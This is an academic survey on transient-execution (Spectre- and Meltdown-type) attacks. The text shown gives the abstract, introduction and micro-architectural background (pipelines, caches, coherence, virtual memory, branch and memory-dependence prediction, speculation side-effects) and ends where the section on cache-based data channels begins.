Nothing Special   »   [go: up one dir, main page]

skip to main content
tutorial
Open access

Transient-Execution Attacks: A Computer Architect Perspective

Published: 06 October 2023 Publication History

Abstract

Computer architects employ a series of performance optimizations at the micro-architecture level. These optimizations are meant to be invisible to the programmer but they are implicitly programmed alongside the architectural state. Critically, the incorrect results of these optimizations are not scrubbed off the micro-architectural state. This side-effect may seem innocuous. However, through transient-execution, an attacker can leverage this knowledge to obtain information from the micro-architectural state and transmit the data to itself. Transient-Execution is a class of attacks that use the side-effects of executed instructions to leak data. Transient-Execution attacks are split into two categories: speculation-based (Spectre-type) and exception-based (Meltdown-type). A successful attack requires, first, access to the sensitive information, and, second, a transmission channel such that the data can be recovered. Therefore, this survey explains how an attacker can use the state from optimizations in the micro-architecture to access sensitive information from other programs running in the same device; and, once the information is obtained, it describes how the data can be encoded and transmitted in the micro-architectural state. Moreover, it introduces a taxonomy and analyzes defenses for such malicious attacks.

1 Introduction

Micro-Architectural attacks have been an extensively researched topic [17, 82, 109, 112, 115, 165]. Traditional micro-architectural attacks relied on exploiting code that, unbeknownst to the programmer, left remnants of information in the cache hierarchy [109, 180]. In turn, the attacker, aware of this fact, knows how to extract that information out of the state in the cache hierarchy. In this sense, the victim was voluntarily offering that information, i.e., the victim was only vulnerable to micro-architectural attacks if they executed the required code sequences and updated their architectural state to reveal information. If the attacker sought to force a victim into executing certain code paths, the attacker had to gain control of the Program Counter (PC), traditionally through a memory vulnerability, and then execute Return Oriented Programming (ROP) [128] or Jump Oriented Programming (JOP) [19]. This all changed when transient-execution attacks were introduced. Transient-Execution attacks showed that, even when the victim executes a code sequence which does not update the architectural state, it can still reveal sensitive data. After the victim’s execution, an attacker can read the victim’s data that is left in the micro-architectural state through side-effects of executed instructions.
Distinguishing between updates at the architectural and micro-architectural levels is key to understanding how transient-execution attacks differ from traditional micro-architectural attacks. Defining a computer architecture requires specifying an Instruction Set Architecture (ISA), which defines a set of instructions that enable the programmer to modify the architectural state. The architectural state is defined by the contents of the register file and the external memory. An implementation of the ISA guarantees the behavior of the provided instructions. A micro-architecture corresponds to a concrete implementation of an ISA. There are no restrictions on how the ISA is implemented. As such, the implementer can design extra micro-architectural states to achieve better performance. The micro-architectural state is a superset of the architectural state that is invisible to the programmer—it is not defined by the ISA.
Transient-Execution attacks leverage the fact that the micro-architectural state is shared between threads and that each thread modifies the shared state in a unique way. One can design programs that, through measurements such as memory access latency, can infer how this shared state has been modified by other threads. In general, a Transient-Execution Attack is split into two components: (1) a method to access a buffer or memory address in an execution path which will not update the architectural state, and (2) data encoding from step (1) into the micro-architectural state such that the information can be recovered later. It is important to distinguish Transient-Execution attacks from side-channel attacks. Even though Transient-Execution attacks use side-channel attacks, the unique characteristic of Transient-Execution attacks is that they rely on side-effects of executed instructions, which may or may not update the architectural state, to gain access to data and transmit it to a micro-architectural state that is shared between threads [81]. Transient-Execution attacks are a recent field, as such the community is actively researching methods and techniques to identify and mitigate attacks. Published proposals range from hardware only [3, 12, 33, 172], to software only [8, 11, 148], and in between [49, 88, 185].
The goal of this survey is to provide an overview of transient-execution attacks and corresponding defense mechanisms through the lens of computer architecture. The information provided herein is targeted at new readers of this field that aims to develop and design micro-architectural components that are protected against transient-execution attacks. Therefore, the descriptions and examples provided feature a generic micro-architectural model not tied to any particular ISA or micro-architecture. This is done for these main reasons: (1) tying explanations to a single micro-architecture narrows the understanding in which each attack or defense can be applied; (2) decoupling from a known ISA or micro-architecture allows the isolation of the primitives that are responsible for an attack/defense; (3) analyzing each attack/defense detached from an ISA or micro-architecture deepens the understanding of the threat model of the system. However, it must be noted that due to the generic descriptions provided herein, some attacks will not work out-of-the-box. This occurs because most of the research in this field focuses on the x86 architecture and Intel’s micro-architecture. Nevertheless, it is the belief of the authors that the general descriptions provided can be of use as a starting point for research in attacks and defenses in different micro-architectures.
This survey explains the micro-architectural components that are traditionally exploited in transient-execution attacks (Section 2) and how the usage of speculation connects them (Section 3). Section 4 explains multiple methods on how data can be encoded and transmitted in the cache hierarchy under a speculation window. With that basis, the original transient-execution attacks (Spectre-BTB, Spectre-PHT, and Meltdown-US) are explained and how they have been enhanced (Section 5). Section 6 discusses and compares the different point-of-views used in state-of-the-art defense proposals, and Section 7 concludes the article. This survey makes the following contributions.
Provide a bottom-up introduction to transient-execution attacks. Starting with the primitives in modern micro-architectures, all the way up to the original transient-execution attacks. This survey explains, describes, and contextualizes the basic concepts and ideas thoroughly;
Present a point-of-view from a computer architecture perspective. The surveys in this area focus more on the practical aspects of the attack, e.g., how to attack commodity systems or how fast an attack is triggered, instead of the micro-architectural primitives behind them and their impact in a generic architecture model [21, 23, 91];
Use a generic micro-architectural model to describe transient-execution attacks. The state-of-the-art tends to focus on x86 due to the market dominance it possesses;
Explain how speculation connects all components in the micro-architecture;
Give a detailed and thorough explanation of the cache hierarchy, and how data is encoded and transmitted in it;
Show a micro-architectural explanation of the original Spectre-PHT, Spectre-BTB, and Meltdown-US attacks, and how they have been enhanced upon;
Propose a taxonomy of the current state-of-the-art defenses for transient-execution attacks.

2 Background: Modern Computer Architectures

Modern computer architectures employ optimizations that transparently alter the expected behavior of the programming model. The expectation is that, given a sequence of instructions, they will be executed by the core one at a time in program-order. Traditional programming models define the architectural state with the contents of two levels of memory: a fast and small register file, and a slow and large external memory. It is the Operating System (OS) responsibility to share the system’s resources between different executing programs. Namely, the OS guarantees that one running program cannot modify the architectural state of another running program. The external memory is a shared resource between all currently executing processes, and is updated on every store. A load will always read from the most recent store to the same address. The micro-architecture may contain multiple cores to execute different programs or multiple instances of a program in parallel. The key concept in all optimizations is that they aims to “hide” the latency of a high-latency instruction while maintaining the expected programming model and architectural results. This section introduces the core background concepts for modern computer architectures and how they run askew from the expected behavior of the programming model.

2.1 Core Execution Architecture

From the programming model, it is expected that a program executes instructions and updates the architectural state in program-order. Each instruction only starts after the previous one has updated the architectural state. However, executing this program in this form constrains its performance as the latency of the program would be the sum of the latency of all instructions. The architecture of such a core is referred to as multi-cycle.
The architecture of the core is split into two components: the frontend and the backend. The frontend is tasked with fetching instructions from memory and feeding instructions to the backend. The backend is tasked with executing the instruction provided by the frontend and updating the architectural state. The backend can be further split into three steps: execute, write-back, and commit. The execute stage moves the instruction from the frontend to the backend and dispatches the instruction to functional units to be executed. The write-back stage stores the results of completed instructions from the execute stage. The commit stage applies the results of the completed instructions from the write-back stage to the architectural state.
To improve performance, the datapath of a core is split into multiple independent logical stages. At the end of each stage, there is a register such that the critical path of the core is shorter. Using this scheme, the core is a series of pipeline stages where each performs a small portion of the work required to apply the instruction to the architectural state. As a result, the latency of each instruction overlaps with the latency of other instructions already in the pipeline. Hence, the smallest latency of a program is achieved when all stages of a balanced pipeline are processing instructions in program-order concurrently.
A performance optimization often employed in a core is to execute independent instructions in parallel. In this instance, the perfect latency of a program would be equal to the instruction stream with the largest dependence chain. In general, any two or more streams of instructions, that have no dependencies between them, can be executed in parallel. Cores that can execute more than one instruction in parallel are referred to as superscalars. The more instructions in parallel that can be executed, the higher the performance of the core is [52]. This metric is referred to as Instruction-Level Parallelism (ILP) and is a general performance guideline for a core [52]. Each instruction may complete execution, or write-back, Out-of-Order (OoO) (in non-program-order). However, younger instructions in program-order cannot update the architectural state before older instructions as that would break program-order and possibly dependence chains (write-after-write and write-after-read hazards) [30, 114]. Recall that the commit stage controls the order in which instructions are applied to the architectural state from the write-back stage. To maintain these properties, another structure, the Reorder Buffer (ROB), allows to commit the instructions in program-order.
To further improve performance, instructions that have their dependencies and functional unit ready should be able to execute. Order is a non-factor as the ROB guarantees that the instructions are applied to the architectural state in-order. Therefore, the execute stage can be decoupled into two stages: issue and dispatch. The issue stage moves an instruction from the frontend to the backend. The dispatch stage moves an instruction from a backend buffer into a functional unit. A core is considered in-order when instructions are only issued to the execution backend and dispatched when all operands are available and there is no structural hazard [114]. A core is considered OoO when instructions are issued regardless of operand availability. The execution backend will then dispatch the instruction when all operands are available and there are no structural hazards [52]. In OoO cores, instructions can execute before other older instructions in program-order. In in-order cores, instructions execute in program-order but they can complete OoO. Using the different execution backends, transiently-executed instructions can be defined. Transiently-Executed instructions are instructions with an execution that leaves measurable side-effects in the micro-architectural state even when they have not been committed or are not going to be committed to the architectural state.

2.2 Cache Hierarchy

Memory instructions (loads and stores) incur a large latency due to accessing a relatively slow external memory. A core would have to overlap the execution of multiple instructions to “hide” the latency of a memory access. This may not be possible due to dependencies, especially in in-order designs, and the core will stall, waiting for a memory response.
To reduce the latency of memory operations, multiple levels of cache are inserted between the core and the main memory. Caches increase their capacity and access time the closer to main memory they are. They are self-managed memories that attempt to predict what data will be reused in the near future and keep it in a cache. A cache is organized into sets containing one or more ways [114]. Each way contains one cache line, typically 64 bytes. When a set is fully occupied, a replacement policy selects which way will be evicted from cache [114]. A cache access has three steps (Figure 1): ① hash the memory address to obtain a pointer to a set; ② compare the input address with the stored addresses in each way; ③ if there is an address match (hit) fetch data from that way, else (miss) fetch data from a higher level memory/cache and one way from the set might have to be evicted if the set is fully occupied.
Fig. 1.
Fig. 1. Three-step operation of a cache.
In order to service the core with multiple memory requests, a cache needs to keep operating when one or more misses occur [52]. To do so, on a miss, the cache controller allocates a Miss Status Hold Register (MSHR) to handle the request asynchronously [84, 135, 161]. The MSHR will handle communication with higher-level memories to obtain the missing cache line, and deal with the eviction. There are two types of evictions depending on if the cache line has been modified by a store (dirty) or not (clean). An evicted dirty cache line needs to update the next high-level memory, whereas a clean cache line can be silently dropped. When the missing cache line is returned, the MSHR inserts the new line in the cache and returns the data.
Using a cache hierarchy, most memory accesses are handled by the cache instead of the main memory. Therefore, the latency of memory accesses is shorter which results in less stalls in the core. By allowing the cache to handle most memory accesses, the cache needs to define when writes are applied to the next higher-level memory. There are two write policies available [75]:
Write-Back (write-allocate): a write first triggers a load of the address to the cache if it is not already cached, and then the write is performed. When the cache line is evicted, if its contents have been modified, it will be written to the next higher-level memory/cache;
Write-Through (write-no-allocate): a write is always written to the next higher-level memory regardless of its presence in the cache. If the address is also in the cache, then the write is also applied to the cache.
Therefore, missing loads will always allocate a way in the cache. Depending on the write policy used, missing stores may also allocate a way in the cache [75]. There are two allocation strategies: write-allocate and write-no-allocate. Write-Allocate allocates lines on write misses; Write-No-Allocate does not allocate lines on write misses. Logically, write-back is used with write-allocate, and write-through with write-no-allocate. However, it is theoretically possible to use any combination of allocation and write policies.
Common modern micro-architectures have two core private cache levels (L1 and L2), and a shared third level, Last Level Cache (LLC), among all cores (Figure 2). For multi-threaded programs that share data, one thread needs to access an address that is cached in another core’s private cache. The thread requesting the data is in one of two scenarios depending on whether the address was written to or not. If the data has not been updated, the requesting thread can fetch it from memory or the cache hierarchy. If the data has been updated, the updated value may only be available in the cache hierarchy.
Fig. 2.
Fig. 2. Memory hierarchy of modern computer architectures. Each core has a private L1 cache, split into data and instruction caches, a private L2, and a shared LLC.
To find and retrieve the requested data, the cache hierarchy must solve two problems: first, it must know if that address is currently cached; second, it must know which cache contains the data corresponding to the address. Since all requests traverse the hierarchy from lower levels to high levels looking for the memory address, a higher-level cache can duplicate data and/or store location information. Therefore, in Figure 2, every cache level from the L2 or higher defines an inclusion policy. There are three common inclusion policies: Inclusive, Non-Inclusive Non-Exclusive, and Exclusive.
Inclusive [14, 90]: the higher-level cache duplicates the data present in all lower-level caches. A missing load or store allocates a way with the same address in all cache levels. The allocations may trigger different address evictions from all cache levels. Evicting an address from a high-level cache that is cached in lower-level caches triggers an eviction of the same address in all lower-level caches (Example in Figure 3(a)). The inclusive policy has been used in Intel’s L2 caches, where the L2 contains the contents of the L1 data cache, and in Intel’s LLCs, where the LLC contains the contents of all lower-level caches [90]. AMD’s Zen L2 caches are also inclusive of the L1 data cache [39];
Non-Inclusive Non-Exclusive [71, 176]: the higher-level cache may or may not duplicate the data present in all lower-level caches. A missing load or store allocates a way with the same address in all cache levels. The allocations may trigger different address evictions from all cache levels. Evicting an address from a high-level cache that is present in low-level caches does not trigger evictions of the same address in all lower-level caches (Example in Figure 3(b)). The non-inclusive non-exclusive policy has been used in Intel’s (Skylake-SP) and AMD’s (Zen 2 and Zen 3) LLCs [39, 176];
Exclusive [14]: the higher-level cache does not duplicate the data present in all lower-level caches. A missing load or store allocates a way with the same address only on the L1 cache. If the allocation in the L1 cache triggers an eviction, the evicted line will be allocated in the next higher-level cache. If the next higher-level cache triggers another eviction due to the previous allocation, the same process repeats until either an empty way is found or the external memory is reached. Evictions from higher-level caches do not trigger evictions in lower-level caches (Example in Figure 3(c)). The exclusive policy has been used in AMD’s Opteron L2 cache, where the L2 cache does not contain the contents of the L1 data cache [4].
Fig. 3.
Fig. 3. Eviction examples for the three inclusion policies: Inclusive, Non-Inclusive Non-Exclusive, and Exclusive.

2.3 Memory Consistency

In multi-threaded systems, multiple threads perform operations on shared memory. A memory consistency model indicates which outcomes are allowed and which are not. The outcomes allowed determine the type of optimizations a micro-architecture can employ when executing memory operations. Specifically, memory models define what kind of memory operation reorderings are allowed. Out-Of-Order designs benefit from reordering memory operations as it allows support for multiple in-flight memory operations in parallel, thus overlapping the latency of multiple memory operations, which improves performance.
There are three main memory consistency models: Sequential Consistency (SC) [85], Total Store Order (TSO) (x86 [10, 65, 110], and RVTSO [126]), and weak order (IBM POWER [94], ARM [12, 94], and RVWMO [126]). The three models are ordered from strongest to weakest. The strongest model (SC) does not allow any type of reordering between memory operations, i.e., memory operations are executed in program-order. TSO allows store-load reordering in the same thread. The weakest models allow any kind of reordering as long as dependencies are maintained.
In practice, simplifying, the key difference between SC and the weaker counterparts is the addition of a store buffer [110, 153]. The store buffer holds committed stores that have not been applied to the memory hierarchy. Adding a store buffer to the micro-architecture is an important optimization, especially for in-order designs, as it allows the core to continue executing instructions before the store is applied to memory. Such a micro-architecture needs to check the store buffer before dispatching any load to the memory hierarchy. If there is an address match, the micro-architecture will fetch the data from the store buffer instead of the memory hierarchy. The order in which stores are drained from the store buffer (write combining [10, 65] and silent stores [65]) to memory and the order loads are dispatched to memory further separates TSO from weaker models. Memory order can be enforced using fence instructions regardless of the reordering performed by the micro-architecture. Fence instructions must guarantee that every older memory instruction must complete and every younger memory access must not start prior to its completion. The same ordering enforcement is applied to Read-Modify-Write (RMW) instructions.

2.4 Cache Coherence

Cache coherence is tasked with achieving a shared global state between all caches in a hierarchy. Since only stores modify memory, coherence protocols can be defined by how and when stores are performed in the cache hierarchy. A coherence protocol serializes all stores to a cached address and ensures that all caches in the hierarchy see the stores in the same order [106]. Therefore, the definition of the coherence scheme is hinged on “propagating stores” to other cache lines. The cache coherence protocol defines two mechanisms in order to achieve this: how the stores are propagated and when they are propagated.
Propagating a store is performed by sending invalidation or update requests. An invalidation request invalidates the cache line at other caches. A thread access to a coherence invalidated line results in a coherence miss in the cache. On a coherence miss, the cache will issue a request to access the latest value of the address from another cache. An update request updates the cache line at other caches with the data from the store that created the request. In this case, there are no coherence misses as the cache is always kept up to date. Industry implementations favor invalidation requests as they require less physical resources to transmit the requests.
Memory consistency models have requirements for store atomicity that the cache coherence implementation must enforce [12, 65, 126, 183]. Either the store completes after being propagated to all caches simultaneously (atomic), or the store completes after being applied to the local L1 cache regardless of the propagation status to other caches (non-atomic).
There have been multiple proposals for coherence protocols with different tradeoffs, they are mostly atomic invalidation-based: MSI, MESI, MOSI, MOESI, and MESIF [2, 38, 95]. The simplest protocol is the MSI protocol. Each cache line keeps metadata on its coherence state. The properties of each state are: the Modified state allows writes and reads to be performed to the cache line and guarantees that all other copies of the same cache line are invalidated; the Shared state allows reads to be performed and other copies must be in the shared or invalidated state; and the Invalid state does not allow reads or writes, other copies of the same cache line may exist in shared or modified state. Changing coherence state of a cache line causes copies of the same cache line to also change state. For example, when a core requests a cache line in M state, regardless of the initial state, all other copies of the same cache line will be invalidated. When a core requests a cache line in S state, any other copy of the same cache line that is in M state will change state to S and any other copy of the same cache line in I state remains unchanged. Figure 4 shows all these state transitions for the MSI protocol.
Fig. 4.
Fig. 4. State changes for a cached line using the Modified-Shared-Invalid coherence protocol. R = read; RW = read and write.

2.5 Virtual Memory and Process Isolation

Virtual memory splits physical memory into different virtual memory spaces where each space is unique to each process. The virtual space contains a set of physical memory regions that can be accessible by a process. This is achieved by providing a translation layer between the process’ addresses (virtual) and the actual memory addresses (physical). To achieve this kind of translation, memory is split into pages that may have different granularities, the minimum typically being 4KiB [10, 58, 127]. On a memory access, translating an address involves traversing a tree of pages (page table walk). The path taken in the tree is given by the virtual address (Figure 5(a)). Each page contains either pointers to the next step in the translation mechanism or the final translation, in Page Table Entries (PTE). The page table walk requires multiple accesses to memory to visit the pages in the various translation levels, which is a high-latency procedure. To avoid traversing the tree every time a memory access is performed, the micro-architecture keeps a cache hierarchy of recently used translations, the Translation Lookaside Buffer (TLB) [114]. Figure 5 shows an example virtual memory system with 32-bit virtual addresses, 4KiB pages, and 4B PTEs, where a translation is performed (Figure 5(a)) using the PTEs shown in Figure 5(b).
Fig. 5.
Fig. 5. Virtual memory system example for a system with 32-bit addresses, 4KiB pages, and 4B PTEs.
Modern commodity operating systems implement process isolation through separate virtual memory spaces for each process. Each page contains metadata on the type of memory accesses allowed (typically read, write, or execute) and the privilege levels (typically user or supervisor) required to perform it. A virtual memory space is private and unique to each process. Attempting to access a non-mapped address, an address which resides in a page with higher privilege levels, or a page that does not support the requested access type will result in a micro-architectural error which, when handled by the OS, results in a process termination.

3 Speculation

The process of speculation involves a prediction over a set of outcomes and a subsequent verification. For example, when the progress of a program depends on the outcome of a high latency instruction, speculation can be used to predict the outcome of the instruction before its result is available allowing speculatively continued execution. A correct prediction avoids the core having to stall for the result before proceeding. However, if the verification concludes that a misprediction occurred, the core will have to rollback and restart from the state immediately before the instruction that performed the prediction.
The fundamental idea behind speculation is that prior to correctly verifying the prediction, any effect generated by the instruction(s) in the prediction is(are) not visible to the architectural state. Otherwise, the program would generate incorrect results. However, as this section shows, certain portions of the micro-architectural state can be programmed implicitly. Specifically, instruction types which speculate are programming the micro-architectural state. It is from the implicit programming of micro-architectural state that speculation introduces security flaws. Speculation is employed in many areas of the core. Herein, three areas are discussed: instruction stream, memory dependencies, and exceptions.

3.1 Instruction Stream

According to the Von Neumann type of operation, the PC is a register that holds a memory pointer to the next instruction to be executed. Any instruction in the ISA updates the PC. Two types of instructions will update the PC in different ways. Non-control instructions select the next instruction to be executed implicitly, e.g., \(PC \leftarrow PC + n\), with n being the number of bytes that encode the instruction. Control instructions or jumps, however, can write any value to the PC, e.g., \(PC \leftarrow x\). Within control instructions, there are two types of jump instructions, unconditional and conditional. Conditional control instructions are predicated instructions: a condition needs to be verified for the jump behavior to be defined. Unconditional control instructions always force the value of the PC. Moreover, a control instruction may calculate the resulting PC differently. Direct jumps use the data that is encoded in the instruction to reach the target address, whereas indirect use data that resides in the architectural state (register or memory).
To know which instruction should be fetched and executed, the core must first decode the current instruction to assert if it is a control instruction. If the decoded instruction is a control instruction, the instruction would have to be executed to obtain the target address and, in case of a conditional jump, its predicate verified. Any core that fetches instructions before decoding all current instructions or executing all previous control instructions is speculating over the value of the PC. Direct jumps know their target addresses early in the pipeline (usually, at the decode stage), while indirect jumps do not. Indirect jumps need to execute to get the target address of the jump. Furthermore, if any of these jumps are conditional, the jump can only be performed after the condition is verified. Deciding the target of the jump and if the jump is taken/not-taken is a high-latency operation. Therefore, to have a high instruction throughput, the core needs to fetch the correct instruction stream ahead of time.
Since the results of the jumps vary per instruction type, modern cores employ different prediction systems [96, 140, 143]. Conditional direct jumps have their target address available early in the pipeline, thus it is best to predict over the outcome of the predicate. Indirect jumps only compute their target address on execution. If the indirect jump is also conditional, the result of the predicate will also only be available on execute. Thus, indirect jumps need to predict over the target, and, if they are conditional, the result of the predicate. Note that, micro-architectures with a high decode latency do not differentiate between direct and indirect jumps [43, 129]. In these instances, they will always perform a prediction on both the target address and the predicate. Two structures can be used to predict over the instruction stream:
(1)
Branch Target Buffer (BTB): each entry stores the target address and a tag to match with the current jump address. Its construction is exactly like a cache. There may be multiple levels of BTBs;
(2)
Pattern History Table (PHT): each entry stores a prediction state indicating if the target address should be written to the PC (taken jump) or not (not-taken jump). The state indicates the confidence of the prediction and its decision. Traditional implementations use a saturating counter [37, 113, 139] whereas more recent implementations use a neural network [72, 73]. If the prediction has low confidence or the prediction is not-taken, the next instruction is fetched from the subsequent address.
The method used to perform the predictions can be further split into two categories depending on what information is used to perform the prediction. A local predictor uses the current value of the PC and the history of this jump to perform the prediction. A global predictor uses information from previous jumps and the current value of the PC. To obtain this information, a new buffer is added, the Branch History Register (BHR), which is composed of the concatenation of the outcome of the previous n jumps. The BHR acts as a n-bit shift-register [51]. The outcome of a jump is shifted into the BHR when the instruction is committed. A local predictor has a table that stores multiple BHRs indexed by the memory address of the jump. The selected BHR indexes the PHT. A global predictor shares the same BHR for all jumps. There are multiple constructions on how the PHT can be indexed. The two most popular are: the XOR result between the BHR and the memory address of the jump (Gshare) [96], and a concatenation of the jump memory address and the BHR (Gselect) [113]. Besides the constructions described herein, there are others that have been adopted [181]. Regardless of the predictor used, the instruction fetch uses the output of the prediction unit and decides to take the target address from the BTB or not. Figure 6 shows an example of local and global predictors with 4-bit BHRs and a 1-bit prediction state. In the literature, the number of bits in the BHR is referred to as m and the number of bits in the prediction state is referred to as n [181]. Predictors are often referred to their (m, n) combination. The examples in Figure 6 are a (4, 1) predictor.
Fig. 6.
Fig. 6. Examples for (4, 1) local and global predictors, and a tournament predictor.
Micro-Architectures that deploy both local and global prediction systems have to decide which prediction result will be used. To decide, another predictor is added on top of the local and global predictors. A predictor that decides which predictor (local or global) will be used is called a metapredictor [96]. The metapredictor is similar to a PHT. The prediction result of the chosen predictor is compared with the result of the jump and the result of the metaprediction is updated. Similarly, the metapredictor can use a saturating counter or a neural network. Prediction systems that make multiple predictors compete for a result are called tournament predictors [76, 96]. Using all of these primitives, a prediction system can be built with multiple types of predictions with multiple levels of predictors all competing with each other. Figure 6(a) shows a tournament predictor example.
Each jump type programs the BTB, PHT, and BHR differently. The modifications are always applied on commit regardless of verification success. The BHR is updated with the result of the jump by shifting in the outcome: 0 as not-taken and 1 as taken. There are two kinds of mispredictions: mispredicting on a decision (taken/not-taken), or on a target. On a target misprediction, the target address is updated. On a decision misprediction, the confidence will increase or decrease based on the outcome of the predicate. The metapredictor is updated depending on the verification success of the prediction made. If the metapredictor used the correct predictor, the confidence will increase toward the predictor used; otherwise, the confidence will increase toward the other predictor.
The Return Address Stack (RAS)/Return Stack Buffer (RSB) is an indirect jump predictor that stores memory pointers to function callers in order to speed up function returns [145]. The stack buffer operates through push and pop operations. Whenever a function is called, the pointer to the instruction after the jump is pushed to the stack. When the same function returns to the caller, the micro-architecture pops the stack and jumps to the address of the instruction that was previously pushed. The speculation in this mechanism occurs when a call or return are detected. A mis-speculation occurs when the popped address does not match the target address of the return.

3.2 Memory Dependence

The memory addresses accessed by instructions are computed at runtime. Therefore, there are scenarios where memory operations cannot be dispatched to memory due to an address’ long dependence chain or the address depends on a high latency instruction. This scenario may cause a younger memory operation to be dispatched prior to an older memory instruction, where both operate over the same address. This results in a memory order violation and will trigger a rollback which impacts the performance of the core [27, 99]. Memory dependence predictors, or address disambiguation units, aims to avoid memory order violations by predicting over the dependencies of multiple memory instructions. Specifically, they look to match up loads and stores, and forward the result of stores to loads. The latter is an important optimization as it reduces the number of cache accesses in the core and the load’s latency. The predictor is successful when it correctly allows the OoO execution of multiple memory instructions which do not share the same address, and stalls a load that will operate over the same address as a previous store [27, 99].
A naive prediction structure in an OoO core is to dispatch all memory operations to the cache hierarchy as soon as their operands are available, i.e., the core predicts there are never any dependencies between memory operations [27, 99]. In this scheme, the Load Store Unit (LSU)/Load Store Queue (LSQ) keeps two queues, one for all in-flight loads and another for all in-flight stores. When stores are issued they will have to check these buffers. A store checks the loads queue for any younger in-flight load to the same address. If there is a match, the core rollsback up to the matching load and forward the result of the store to the matching load. Loads also check the load queue for younger in-flight loads to the same address. This is done because some memory models do not allow loads to be reordered with each other even if there is no intermediate store (more details can be found in [106]). In case the memory model disallows this type of reordering and if there is a match, the core rollsback up to the matching load.
An improvement over the prediction structure is to start storing the memory addresses for every set of mis-predicted memory instructions. Specifically, store the links between stores and their dependent loads, and loads and their dependent loads [27, 99, 138, 146]. The predictor is programmed by using the virtual address and partial information from the physical address [27, 66, 70, 100, 101, 146]. The prediction verification occurs when the address of a memory operation is processed, the computed address is compared with the predicted address. If the addresses are different, a rollback is triggered [36, 70, 100].

3.3 Exceptions

Exceptions correspond to errors that occur during instruction execution. They serve to inform the execution environment that an error occurred and it should be handled. The exception is handled when the instruction which created the exception is committed. Multiple components in the core can trigger exceptions, such as: the floating-point unit [10, 12, 64, 65, 126], the vector unit [10, 12, 65, 67, 126], the division unit [10, 65], the load-store unit [10, 12, 65, 126], and the instruction fetch unit [10, 12, 65, 126]. This subsection focuses on exceptions triggered by memory operations (load-store unit and instruction fetch unit) because of the core’s interactions that occur while handling virtual memory.
All speculation forms described in the previous sections have assumed that the addresses accessed are always mapped to the virtual memory of the process and the pages accessed have the correct set of permissions to perform the operation. On a system with virtual memory support, a memory operation, either an instruction fetch or data access, requires three verifications to be performed before committing, as in Listing 1: the core must verify if the page is mapped in the process’ memory, if the page is present in memory, and if its permissions allow such an operation.
Translating a virtual address to a physical address is a high-latency task. It requires a page table walk to obtain the physical address, setting the access bit and possibly the dirty bit of the page, and a check for the page’s permissions. Moreover, the latency is significantly higher if the page is not present in memory, which will require the operating system to fetch the page from disk to memory and resume execution of the process.
Cores assume that most memory accesses will access pages that are in memory, their translations are in the TLB, and the page has the correct set of permissions to allow the access. As such, there is a fast path to access the translation (TLB) and the permissions. To further exploit these fast paths, L1 caches can be virtually indexed and physically tagged [36, 166]. An example interaction would be checking the permissions and obtaining the translation in parallel [87]. As soon as the physical address is obtained but before the permission check completes, the memory access can be performed. The result of this memory access can be forwarded to other dependent instructions even if the permission check fails. This is possible because the result of the load will never be architecturally visible as a permission check fail will trigger an exception.
Listing 1.
Listing 1. Pseudo-Code of a virtual memory access with a page-based virtual memory; access_type denotes if the memory operation is an instruction fetch, a load, or a store.

3.4 Side-Effects

From the micro-architectural point-of-view, speculation only operates in the domain of the hardware thread that has performed the prediction. The commit stage gates the effects of speculation: if the prediction is correct the effects are made visible, otherwise they are not. However, even though within the architectural domain the effects of the speculation are squashed, some remnants of speculation can still be obtained from other parts of the micro-architecture. Therefore, there are instruction types which, besides the ISA defined architectural behavior, also implicitly modify the micro-architectural state regardless of outcome of the speculation. Table 1 shows which instruction types program which component.
Table 1.
Instruction TypeAffected Micro-Architectural Component
Control InstructionsPHT [81], BHR [15], BTB [81], RAS [83], Cache Hierarchy [42, 90], Coherence Network [3, 177], MSHRs [135, 161], TLBs [158, 168], Network-on-Chip (NoC) traffic [111], DRAM Buffers [116]
Memory InstructionsMemory Dependence Prediction Unit [54, 159], Cache Hierarchy [42, 90], Coherence Network [3, 177], MSHRs [135, 161], TLBs [158, 168], NoC traffic [111], DRAM Buffers [116]
Integer/Floating-Point/Vector InstructionsFunctional Unit Occupation [18]
Table 1. Components Programmed by Side-Effects of Each Instruction Type
As the cache hierarchy is a transparent resource to the core, the effects of speculative memory and control instructions are not wiped on commit. The data a core uses always comes from the L1 cache. Therefore, the results of mispredictions change the global state of the cache hierarchy (allocate cache lines, evict cache lines, change the state of the replacement policy of a set, etc): mispredicted branches and jumps (Section 3.1), mispredicted address dependencies (Section 3.2), and mispredicted exceptions (Section 3.3). All memory accesses and/or control instructions that stem from these mispredictions will also change the global state of hierarchy [81, 87].
Similarly to the cache hierarchy, the coherence scheme is also transparent to the cores. Mispredictions cause coherence traffic to flow through the cache hierarchy [3, 69, 172, 178]. Although the traffic is created by speculative instructions, it still changes the state of the global cache coherence, e.g., a cache line in a modified/exclusive state in a core is modified to a shared state when a load instruction is executed through a misprediction from another core.
Most modern cache hierarchies use the write-back write-allocate write policy [36, 39]. Any memory operation that misses on a cache, triggers a load of the cache line from a higher level memory to the cache that issued the miss. Therefore, MSHRs are allocated every time a memory access misses on a cache level. When a cache level runs out of MSHRs, memory accesses cannot be dispatched to the cache hierarchy. Thus, the usage of MSHRs may reveal the memory access pattern or the contents accessed by the core [135, 160].
The cache hierarchy contains all forms of mis-speculation since the core will issue prefetch requests for data and coherence that have not been committed yet [42]. A load prefetches a cache line with coherence read permissions prior to commit. A store prefetches a cache line with coherence write permissions prior to commit. This is a common technique in designs with OoO execution to overlap the latency of the memory access with other instructions. The core verifies the speculation of loads by checking for a cache line hit when committing it. For a store, the core checks for a cache line hit and if the cache line has coherence write permissions. Besides the cache hierarchy, other components are also implicitly programmed such as the DRAM buffers [116], execution ports [18], system interrupts [28], and micro-op caches [124].

4 Retrieving DATA from Speculation Side-Effects in the Cache Hierarchy

Every program leaves remnants of transient execution throughout the cache hierarchy. However, those remnants have little to no value if they cannot be identified and if the data used within the transient execution cannot be recovered. An attacker wants to recover the information resulting from a victim transient execution that circumvents the process isolation provided by the virtual memory. This section focuses on identifying instruction sequences that build communication channels in the cache hierarchy such that the attacker can recover this information. Note that, the cache hierarchy is not the only component from which communication channels can be built from. There has been researched on building communication channels through DRAM buffers [116], contention in execution ports [18, 81], system interrupts [28], and micro-op caches [124]. However, this section focuses solely on the cache hierarchy because it is a common component of all modern micro-architectures, the channel is simple to deploy (requires few memory accesses), and can be local to the same physical core or remote across different physical cores.
